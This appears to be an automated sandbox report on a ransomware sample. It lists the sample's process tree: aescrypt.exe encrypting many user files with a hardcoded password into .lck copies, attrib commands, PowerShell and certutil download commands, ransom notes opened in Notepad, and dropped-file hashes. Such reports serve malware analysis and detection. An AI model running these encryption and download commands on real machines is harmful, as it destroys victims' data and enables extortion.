C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Wallpaper.jpg.lck" "Wallpaper.jpg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Wallpaper.jpg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RenameTest.raw.lck" "RenameTest.raw"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "RenameTest.raw.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UninstallPush.dib.lck" "UninstallPush.dib"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UninstallPush.dib.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CompleteOpen.svgz.lck" "CompleteOpen.svgz"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "CompleteOpen.svgz.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertEnable.wmf.lck" "ConvertEnable.wmf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConvertEnable.wmf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SyncOpen.png.lck" "SyncOpen.png"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "SyncOpen.png.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RequestBackup.pcx.lck" "RequestBackup.pcx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RequestBackup.pcx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ExportHide.bmp.lck" "ExportHide.bmp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ExportHide.bmp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceStop.raw.lck" "TraceStop.raw"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "TraceStop.raw.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SearchCheckpoint.gif.lck" "SearchCheckpoint.gif"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "SearchCheckpoint.gif.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResumeConfirm.dib.lck" "ResumeConfirm.dib"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ResumeConfirm.dib.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OpenSkip.dwg.lck" "OpenSkip.dwg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "OpenSkip.dwg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MeasureSend.cr2.lck" "MeasureSend.cr2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "MeasureSend.cr2.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WatchHide.tif.lck" "WatchHide.tif"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "WatchHide.tif.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CompleteEnable.dxf.lck" "CompleteEnable.dxf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "CompleteEnable.dxf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SendRestart.ico.lck" "SendRestart.ico"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "SendRestart.ico.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ClearTrace.emz.lck" "ClearTrace.emz"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ClearTrace.emz.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SwitchRestart.tif.lck" "SwitchRestart.tif"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "SwitchRestart.tif.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutInitialize.crw.lck" "OutInitialize.crw"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "OutInitialize.crw.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResumeSync.crw.lck" "ResumeSync.crw"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "ResumeSync.crw.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ExportUndo.eps.lck" "ExportUndo.eps"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ExportUndo.eps.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InitializeConvert.tiff.lck" "InitializeConvert.tiff"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "InitializeConvert.tiff.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DisconnectPop.bmp.lck" "DisconnectPop.bmp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DisconnectPop.bmp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WriteDisable.emf.lck" "WriteDisable.emf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "WriteDisable.emf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CloseExpand.dxf.lck" "CloseExpand.dxf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "CloseExpand.dxf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadRegister.tiff.lck" "ReadRegister.tiff"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "ReadRegister.tiff.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadDismount.jpg.lck" "ReadDismount.jpg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ReadDismount.jpg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectWait.svg.lck" "ConnectWait.svg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConnectWait.svg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DismountFind.emf.lck" "DismountFind.emf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DismountFind.emf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UpdateUnblock.svg.lck" "UpdateUnblock.svg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UpdateUnblock.svg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "GrantFind.png.lck" "GrantFind.png"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "GrantFind.png.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceRead.dxf.lck" "TraceRead.dxf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "TraceRead.dxf.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BackupSync.dib.lck" "BackupSync.dib"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "BackupSync.dib.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RepairSearch.crw.lck" "RepairSearch.crw"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "RepairSearch.crw.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "GetFind.png.lck" "GetFind.png"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "GetFind.png.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WaitGet.wmf.lck" "WaitGet.wmf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "WaitGet.wmf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceComplete.svg.lck" "TraceComplete.svg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "TraceComplete.svg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WriteApprove.jpeg.lck" "WriteApprove.jpeg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "WriteApprove.jpeg.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Everywhere.search-ms.lck" "Everywhere.search-ms"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Everywhere.search-ms.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Indexed.lck" "Indexed"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Indexed.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c Invoke-WebRequest -Uri -OutFile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /aD /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Indexed.lck" "Indexed"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Indexed.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c Invoke-WebRequest -Uri -OutFile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f3⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\InstallLock.xps.lck1⤵
- Modifies registry class
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt3.txt1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\Desktop\p2d.bat" "1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt2⤵
- Opens file in notepad (likely ransom note)
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap10835:64:7zEvent30677 -ad -saa -- "C:\Users\Admin\Desktop\p2d"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
2162be721b7178c7b599e9a3fd5a4460
SHA1a97f7c70e7e650df74edef8b629545994c5233da
SHA25684d6c7697f194bc748b16d0c02e5a785a52f513b36124b8b8a63d75d9c3692e7
SHA512da0ed6efb067cf7afba18c26e8b5cadbff9a8c337d4bb7a5db7a47780af82cce7e7d4df2cbaace1b79f5d52d13c22ea16927a412fd1515adf9bbe19acdb90e0d
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\50C1.batMD5
a3c193e950cda43a378e5765185f9c1c
SHA1e29c1d0ebe4c7c442a87677fa0263eef9c71922c
SHA256eaa894251d600481affb0ae4aea9669ccf8bb0cc16df20d3215d2b8b4be40c8a
SHA5125361701b35fa8a2e3b930d3ab4ce90cb2c687c75e398fcc82e688852ff629dd5cc222efb3c1899fd6712b6e4eb9eab1a745932742c50f7d3f6b35039c37cd62d
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\extd.exeMD5
38ce85e4580071c40bb204edfb85a303
SHA1eba80056f4a15fa131478532483b8abe050c6999
SHA256f0ffddcf4b507a617d6883889f5167cc6c2d27015ef63ad3e014db314cd8f465
SHA5120a310a94a418926524e16c15186ba89797b52cdf1ebcdd4f59b79c3963afdf07ea8ea8e58b23d5126590f3ff0bd2902a6f66d9b05e4b5b481331a97d0b6956fa
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\extd.exeMD5
38ce85e4580071c40bb204edfb85a303
SHA1eba80056f4a15fa131478532483b8abe050c6999
SHA256f0ffddcf4b507a617d6883889f5167cc6c2d27015ef63ad3e014db314cd8f465
SHA5120a310a94a418926524e16c15186ba89797b52cdf1ebcdd4f59b79c3963afdf07ea8ea8e58b23d5126590f3ff0bd2902a6f66d9b05e4b5b481331a97d0b6956fa
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook.exeMD5
fb7a78f485ec2586c54d60d293dd5352
SHA1d4e1f1061f7a872f9843e44c7d27d13ba7ef71bb
SHA256b116ff00546620a598119d6704e9849393d2f9948fc8888d6ddf6211aa5b80b9
SHA512b6635e849ab96740e5cefef3a874dc58cc26aa18ccc9cca31e61e541c2ddeade7eb59e524fc36df22e0656884733f29d1143ffbf1cdd92fbd636d134d723c3e5
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook.exeMD5
fb7a78f485ec2586c54d60d293dd5352
SHA1d4e1f1061f7a872f9843e44c7d27d13ba7ef71bb
SHA256b116ff00546620a598119d6704e9849393d2f9948fc8888d6ddf6211aa5b80b9
